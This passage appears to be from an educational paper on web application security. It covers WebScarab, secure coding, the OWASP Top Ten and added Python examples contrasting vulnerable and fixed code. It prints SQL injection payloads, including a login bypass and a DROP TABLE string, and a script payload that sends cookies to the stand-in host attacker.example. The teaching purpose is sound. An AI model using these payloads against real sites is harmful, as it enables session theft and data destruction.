• Reveal Hidden Fields: WebScarab allows a user to view hidden fields within the web presentation for manipulation, deletion, or reconnaissance.
• Spider: Allows for analysis of the web application which may reveal additional links that are not known initially.
• Beanshell: This is a feature which allows for the scripting of arbitrary Java code against requests and responses passing between the web client and server.
Figure 5: WebScarab: Editing of web post
Figure 6: WebScarab: Directory structure view of webpage
Secure Coding

Awareness of the importance of web application security has jumped significantly in just a few years; 93 percent of those surveyed felt that secure application development was more of a priority now than three years ago (Symantec, 2006).
"Security training is at the heart of writing good code", writes John Heimann of Oracle (Heimann, 2006). For organizations that make Internet connected systems available to the public, security training is a must have and is often missing from many developers' backgrounds. "It's an unfortunate fact that most developers are not required to learn secure coding practices in school", noted Heimann. Too often within academia and within the corporate world the focus in educating developers is on creating efficient, bug free code. Security checks are optional at best and are rarely considered.

References to secure coding methodologies and practices can be found here:
http://www.microsoft.com/uk/msdn/security/developer_security.mspx

As an example, most programmers would consider the implementation of a specific check on the length of web form input to be unnecessary and wasteful of valuable CPU cycles. Unfortunately, for every programmer out there that is unaware of secure coding practices there are attackers out there that are not only aware but capable of searching for and taking advantage of these loopholes left behind by developers.
OWASP

The Open Web Application Security Project, commonly referred to as OWASP, is an open source project dedicated to the discovery and fighting of insecure software (Wikipedia).

The open source OWASP community is made up of corporations, educational entities, and developers and security practitioners located on all seven continents. They are best known for their creation of articles, methodologies, documentation, and tools which are all freely available for use in the development and testing of secure application code (OWASP, 2007).

Some of the notable tools that OWASP has produced include WebGoat, a web application penetration testing environment, WebScarab, mentioned earlier, and the OWASP .NET tool set. Most famously though, OWASP is responsible for producing the OWASP Top Ten, which is an application security awareness document. In the next section we will highlight the Top Ten, and the vulnerabilities most often found within web applications.
OWASP – Top Ten

The OWASP Top Ten is often considered the de facto standard when looking at many audit controls and by security firms responsible for assessing code.

Specifically, PCI DSS, the payment card industry data security standard, a standard enforced jointly by American Express, Discover, Visa, MasterCard, and JCB, requires organizations which store or process credit card data to implement secure coding procedures within their SDLC.

This requirement ensures that all web applications developed in house are securely coded and reviewed for the following vulnerabilities (PCI and Data Security Compliance, 2007).

Top Ten Highlights

Before getting into a few specific types of attack we will dive into some of the more prominent Top Ten vulnerabilities from a higher level. It is important to understand the breadth of attacks that are covered by the Top Ten to truly understand its value amongst the development community.
Unvalidated Input:

Unvalidated input is defined as any information received via web requests which is not validated before being used by a web application.

Commonly attackers target these vulnerabilities to attack backend components through a web application. Usual targets include the web application layer itself, the underlying OS that supports the web application, and backend databases which often contain sensitive customer information, credit cards, social security numbers, and intellectual property.

Examples of attacks enabled by unvalidated input include cross site scripting attacks, buffer overflows, and injection flaws.

Buffer overflows are also common areas of concern when writing secure applications. Exploiting buffer overflows requires an attacker to identify fields in a vulnerable application which do not perform bounds checking. Writing outside the bounds of a memory block can corrupt data, crash the program, allow execution of attacker supplied code, and even crash the entire operating system, subjecting an organization to unnecessary downtime.

Broken Access Control:

Another commonly overlooked vulnerability when creating web applications is broken access control. Access is granted to specific authorized users of web applications to perform a specific function based upon their need and the general role that they serve. Broken access control vulnerabilities provide a means for malicious users to escalate privileges beyond their intended permissions. This flaw may allow for the unauthorized viewing of other users' accounts, the viewing of sensitive configuration files, or escalation to that of a root user.
Broken Authentication and Session Management

In the realm of online banking the sanctity of the user authorization/authentication component is paramount to both the customer's and the bank's well being and reputation. Without a tested and proven safe authentication model customers are unlikely to use online banking, something that saves banks significant amounts of money annually (Lee, 2001).

Authentication and session management relate to the direct processing of user, application, or system authentication and the subsequent need to manage these active sessions. Without reliable authentication, trust is lost and accountability escapes the process.

Authentication methods with web applications nearly always involve a username and password. Because of this it is vitally important to ensure that these credentials are not easily accessible. Features such as password resets and forgotten usernames should all be protected and require re-authentication via a password hint, mother's middle name, or some other authentication method. Bear in mind that such knowledge based questions are only as strong as the secrecy of their answers, which are frequently guessable or discoverable.

Commonly overlooked areas of weakness within web applications include:

1. Password Strength – ensure that PAM modules or like enforcement is used within the application. Dictionary word attacks are common amongst web applications, and unless complexity is enforced authentication mechanisms are
2. Password Use – Too many failed authentication requests in a given period of time should lock or freeze an account for a given period of time.
3. Password Change Controls – When changing a password users should be required to provide both the old and new password before being able to change it. Use of email as a confirmation of a password change is another enforcement mechanism which will often alert an unsuspecting user to someone tampering with their login information.
4. Browser caching – neither authentication nor session data should be present in retrieval requests from web servers. In addition, cache options within a web application may allow a browser to store cookies. This can be dangerous for computers which are accessible from Internet cafes, libraries, and other publicly accessible terminals. Caching of cookies could allow another, unauthorized user to impersonate a user through cookie/session id manipulation.
Injection Flaws

Injection flaws occur when attacker controlled data is passed to an interpreter as part of a command or query, and can be used to subvert the authentication and authorization of an operating system, application, or other service. Malicious users can take advantage of weaknesses in applications which fail to filter client supplied input before making system calls, and can run external applications such as netcat or ssh, or even entire scripts. These weaknesses can be present any time an interpreter is used within a web application; as such, code must be reviewed before pushing out to production systems.

SQL injection flaws are some of the most popular attack vectors for attackers as they can often reveal enormous amounts of sensitive data: customer information, credit card numbers, employee information, social security numbers, and other sensitive information.
SQL Injection Attack Example

As previously mentioned, SQL injection attacks can occur when user input is not filtered properly before being placed into a query. Characters with meaning to the SQL parser, such as the quote that terminates a string literal, are used to break out of the intended statement so that the remainder of the input is parsed as SQL. Once the attacker controls part of the statement, an often unauthorized SQL query against a back end database can be performed. Viewing tables, dropping tables, and adding usernames are all very popular methods of gaining unauthorized access to both applications and underlying stored data.

The following example illustrates this:

An attacker who wishes to retrieve the usernames of all active users could do so against an application that uses an SQL backend and does not filter or parameterize input at the application or middleware layer. For this particular example the attacker wishes to learn the usernames authorized to use an application.

Within the domain mybank.com the following can be used to retrieve usernames provided the table and column names that are passed are accurate. Many times it is easy to guess the names that are used to identify parameters such as username, DOB, SOCSEC, password, etc.

Example:

User visits: http://www.mybank.com

When attempting to retrieve the usernames of fellow bankers:
http://www.mybank.com/login/login.asp?loginid=bobsmith' or 'd'='d

If the application concatenates this parameter into its query, the generated SQL statement is:

SELECT loginid, FirstName FROM User WHERE loginid = 'bobsmith' or 'd'='d'

This condition will always be true because 'd' always equals 'd'. Thus all loginid and FirstName pairs will be returned (Imperva, 2007).

Another way to abuse SQL injection is to DROP tables, which can cause irreparable harm to an underlying database and the supported application.

http://www.mybank.com/login/login.asp?loginid=bobsmith'; DROP TABLE USERS--

This statement will delete the USERS table provided it exists and the database driver permits stacked statements in one request; the trailing -- (or the comment syntax of the target database) discards the rest of the original query. Deleting this USERS table would likely render the application useless as users would not be able to log in to the underlying application (SQLCourse.com, 2006).

SQL injection attacks are only limited to the creativity and resourcefulness of the attacker. Usernames could be added along with passwords, billing amounts could be changed, interest paid and balances altered; all of this is possible with weak filtering at the application and database layer. The reliable defense is to keep data out of the statement text altogether by using parameterized queries (bound parameters) rather than string concatenation.
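The login lookup above, built two ways against an in-memory SQLite database, as an added example for this edition (not code from the original paper or from any cited source). The schema, the sample rows, the function names and the stacked-query probe are constructed for illustration; nothing is known about mybank.com's actual application.

```python
"""The login lookup from the text, built two ways against SQLite.

Added example, not code from the original paper or from any cited source.
The schema, the sample rows and the function names are constructed for
illustration.
"""
import sqlite3

# The payload from the text: closes the string literal, then appends an
# always-true condition.
PAYLOAD = "bobsmith' or 'd'='d"


def make_db():
    """Create the constructed User table with three sample accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE User (loginid TEXT PRIMARY KEY, FirstName TEXT, Password TEXT)"
    )
    conn.executemany(
        "INSERT INTO User VALUES (?, ?, ?)",
        [("bobsmith", "Bob", "hunter2"), ("alice", "Alice", "s3cret"),
         ("carol", "Carol", "qwerty")],
    )
    return conn


def lookup_vulnerable(conn, loginid):
    """Builds the statement by string concatenation, the pattern the text warns
    about: whatever the user typed becomes part of the SQL itself."""
    sql = "SELECT loginid, FirstName FROM User WHERE loginid = '" + loginid + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, loginid):
    """Same query with a bound parameter: the driver hands the value to the
    database separately from the statement text, so it is never parsed as SQL."""
    sql = "SELECT loginid, FirstName FROM User WHERE loginid = ?"
    return conn.execute(sql, (loginid,)).fetchall()


def stacked_drop_attempt(conn):
    """Send the DROP TABLE payload from the text through the vulnerable lookup
    and report whether the User table survived. sqlite3's execute() accepts a
    single statement per call, so this driver rejects the stacked statement;
    a driver that allows stacking would run the DROP."""
    try:
        lookup_vulnerable(conn, "bobsmith'; DROP TABLE User; --")
    except Exception:          # sqlite3 raises Warning or ProgrammingError here
        pass
    row = conn.execute(
        "SELECT name FROM sqlite_master WHERE name = 'User'"
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_vulnerable(db, PAYLOAD))      # every account
    print("parameterized:", lookup_parameterized(db, PAYLOAD))  # no match
    print("User table survived stacked DROP:", stacked_drop_attempt(db))
```

The vulnerable lookup returns every row for the payload because the injected condition is appended to the statement, while the parameterized lookup returns nothing because it searches for a login literally named `bobsmith' or 'd'='d`. The stacked-query probe shows the caveat made above: whether `; DROP TABLE` works depends on the driver, not on the application's own code, so it is not something to rely on in either direction.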
Unvalidated Input Example: XSS

Cross site scripting is an attack against the users of a web application rather than against the server itself: the hosting web application is the delivery vehicle for attacker supplied script that runs in the victim's browser with the application's origin and privileges. An attacker will often target web applications that do not filter or encode scripts from form fields submitted to web applications. For example, attackers are often able to insert code which gets executed by the user's browser. This code will attempt to steal browser cookies that might include banking session data, passwords, or the like. Session cookies are then used by the attacker to emulate a legitimate user session to a banking site, email account, or the like.

The diagram below illustrates this relationship between attacker, web application, and website using a XSS attack. (Skoudis, 2005)

Getting into the technical jargon behind some of the advanced cross site scripting attacks is beyond the scope of this paper.
A fantastic series of examples of cross site scripting can be found here: http://www.devshed.com/c/a/Security/A-Quick-Look-at-Cross-Site-Scripting/1/
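As an added example for this edition (not code from the original paper or from Skoudis, 2005), the following Python shows the cookie-stealing scenario described above from the application's side: a comment field rendered into the page as-is beside the same field HTML-encoded, and a session cookie issued with the flags that keep it out of reach of script. The page template, the comment payload, the attacker host (attacker.example is a reserved name that does not resolve) and the function names are all constructed.

```python
"""Reflected user content rendered unescaped and escaped, plus a session cookie
that scripts cannot read.

Added example, not code from the original paper or from Skoudis (2005). The
page template, the comment payload and the attacker host are constructed for
illustration; attacker.example is a reserved, non-routable name.
"""
import html
from http.cookies import SimpleCookie

# Constructed payload of the kind the text describes: it ships the visitor's
# cookies to a host the attacker controls, disguised as an image request.
PAYLOAD = ("<script>new Image().src='http://attacker.example/?c='"
           "+document.cookie;</script>")

TEMPLATE = '<html><body><p class="comment">{comment}</p></body></html>'


def render_vulnerable(comment):
    """Interpolates the submitted comment into the page as-is, so any markup or
    script in it becomes part of the page served to every other visitor."""
    return TEMPLATE.format(comment=comment)


def render_escaped(comment):
    """Encodes the characters that matter in HTML text (<, >, &, ", ') so the
    browser displays the comment instead of parsing it."""
    return TEMPLATE.format(comment=html.escape(comment, quote=True))


def has_script_element(page):
    """Crude check, used here only to show the difference between the renders."""
    return "<script" in page.lower()


def session_cookie_header(session_id):
    """Set-Cookie value for a session id with HttpOnly (not readable from
    document.cookie, so the payload above gets nothing even if it does run)
    and Secure (sent only over HTTPS)."""
    jar = SimpleCookie()
    jar["session"] = session_id
    jar["session"]["httponly"] = True
    jar["session"]["secure"] = True
    jar["session"]["path"] = "/"
    return jar.output(header="").strip()


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))
    print(render_escaped(PAYLOAD))
    print("Set-Cookie:", session_cookie_header("abc123"))
```

Output encoding is context dependent: html.escape is right for text between tags and for quoted attribute values, but not for content placed inside a script block, a URL, or an unquoted attribute, each of which needs its own encoding. HttpOnly does not stop the script from running; it removes the cookie as a prize, which is the specific loss the text is concerned with.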
Summary

Many of these attacks can be prevented and/or detected before they do irreparable harm. Proper defenses require a defense in depth approach. Only a few of the possible approaches have been discussed in this paper, and in time these strategies will likely require tweaking and improvement as attack vectors invariably evolve.

In summary, a combination of technologies and user awareness is the only effective way of truly defending against web attacks. Technologies such as application layer firewalls, reverse proxies, and Intrusion Detection and Prevention systems, coupled with a solid security training program for application developers, will yield significant security enhancements. Additionally the use of code review tools and scanners will provide proactive resources that both developers and in house security professionals can leverage in discovering application layer weaknesses.

For many businesses which conduct business online, their reputation is at stake. One breach can oftentimes lead to irreparable brand damage. Putting a price on the amount of damage done is oftentimes extremely difficult, though losses to public companies can be in excess of billions when stock valuations are considered.
http://esj.com/Case_Study/article.aspx?EditorialsID=2249
REFERENCES

Desmond, Paul (2004, May 17). All-out blitz against Web app Attacks. Retrieved December 30, 2006, from networkworld.com Web site: http://www.networkworld.com/techinsider/2004/0517techinsidermain.html

Heimann, John (2006, May 23). The Importance of Security Training. Retrieved October 31, 2006, from CIO Update website: http://www.cioupdate.com/article.php/3608391

Imperva (2007, February 1). SQL Injection. Retrieved February 10, 2007, from http://www.imperva.com/application_defense_center/glossary/sql_injection.html

Internet World Stats (2007, January 11). Internet World Stats, Usage and Population Statistics. Retrieved February 01, 2006, from http://www.internetworldstats.com/stats2.htm

Krebs, Brian (2006, September 28). ID Thieves Turn Sights on Smaller E-Businesses. Retrieved December 30, 2006, from WashingtonPost.com Web site: http://www.washingtonpost.com/wp-dyn/content/article/2006/09/28/AR2006092800333.html

Gartner (2006, May 12). Magic Quadrant for Security Information and Event Management. Retrieved February 28, 2007, from Novell.com Web site: http://www.novell.com/products/sentinel/gartner.pdf

Gartner (2005, May 2). Improve IT Security with Vulnerability Management. Retrieved February 27, 2007, from Gartner.com Web site: http://www.gartner.com/DisplayDocument?doc_cd=127481

Halloway, Jason (No Date Provided). Risk and Security Rewards. Retrieved February 27, 2007, from CSOONLINE.COM Web site: http://www.csoonline.com/caveat/012907.html

Lee, Mie-Yun (2001, July 1). Money in the eBank – training customers to trust online banks. Retrieved February 10, 2007, from http://findarticles.com/p/articles/mi_m0DTI/is_7_29/ai_79826907

OWASP (2007, February 10). Welcome to OWASP. Retrieved February 10, 2007, from http://www.owasp.org/index.php/Main_Page

OWASP. (2006, December 21). In Wikipedia, The Free Encyclopedia. Retrieved February 01, 2007, from http://en.wikipedia.org/wiki/OWASP

PCI and Data Security Compliance (2007, January 19). Wordpress website. Retrieved February 15, 2006, from http://datasecurity.wordpress.com/2007/02/05/owasp-top-10-for-2007/

Skoudis, Ed (2005). SANS TRAINING TRACK 4. Retrieved October 31, 2006, from SANS Institute training documents. Not distributed publicly.

SQLCourse.com (2006, May 12). SQLCourse.com website. Retrieved October 31, 2006, from http://sqlcourse.com/drop.html

Symantec News Release (2006, September 19). Symantec.com website. Retrieved October 31, 2006, from http://www.symantec.com/about/news/release/article.jsp?prid=20060919_01